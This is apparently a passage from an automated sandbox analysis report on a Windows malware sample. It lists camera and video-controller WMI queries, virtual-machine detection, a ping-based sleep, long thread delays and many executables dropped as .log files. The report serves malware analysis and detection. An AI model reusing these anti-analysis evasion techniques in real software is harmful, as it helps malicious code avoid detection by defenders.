                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeMemory allocated: 1AD30000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeMemory allocated: 1310000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeMemory allocated: 1AD10000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeMemory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC832D0 rdtsc 11_2_00007FFD9BC832D0
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC6773D sldt word ptr [eax]4_2_00007FFD9BC6773D
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599657Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599532Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599407Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599297Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599188Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598946Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598844Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598735Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598610Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598360Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597985Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597860Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597641Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597516Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597407Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597282Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597172Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596938Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596813Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596703Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596594Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595974Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595856Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595734Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595610Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595364Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594985Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594875Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594530Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594421Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 593953Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWindow / User API: threadDelayed 2647Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWindow / User API: threadDelayed 7113Jump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\bzLxRmdk.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\NhTpGmEa.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\FxsAqTHc.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\LYOHFeSO.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\vGpScIbo.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\AfbbeRiC.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\hkEDPjHT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\vOZlGrCu.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\GcNqxydU.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\gIdVKdin.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\jBsEwaTl.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\bmSpwCMB.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\YppwRUxj.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\BpvsVBNg.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\JrdzzpEh.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\ILIJsLjp.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\tTFBRhfQ.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\ipPePSwT.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\aONOculH.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\lfFVXOxM.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\rYiuzuCB.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\WEJfKGnq.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\ihfMljWN.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\krBMlBBO.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\pVwLeLxF.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\TLuxYJBs.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\zLibuNkF.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\IQRzjLYS.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\TrDhynDR.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\mJqNRsNh.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\IuBreppm.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\RIIODaxx.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\brbenDCe.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\BySrFogd.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\eGrnpudr.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\UfHpjBzP.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\YGwOgprl.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\GuUJMTWW.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\BOUJPwoA.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\gzGVarPq.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\tyuuQYhQ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\OwCQqHNY.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\cRzxxdpC.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\dtNNImGZ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\CLwRlwDv.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\sGbclZIy.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\mrjuDXUe.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\TighOBkV.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\ehSVuzCX.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\KcbhohwK.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\mBGunJnb.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\eObFTdEx.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\kyUMRaig.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeDropped PE file which has not been started: C:\Users\user\Desktop\QyoyMrRT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe TID: 3068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 3872Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599874s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599766s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599657s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599532s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599407s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599297s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599188s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -599063s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 6488Thread sleep time: -10800000s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598946s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598844s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598735s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598610s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598485s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598360s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598235s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -598110s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597985s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597860s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597750s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597641s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597516s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597407s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597282s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597172s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -597063s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596938s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596813s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596703s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596594s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596485s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596360s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596235s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -596110s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595974s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595856s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595734s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595610s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595485s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595364s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595235s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -595110s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594985s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594875s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594766s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594641s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594530s >= -30000sJump to behavior
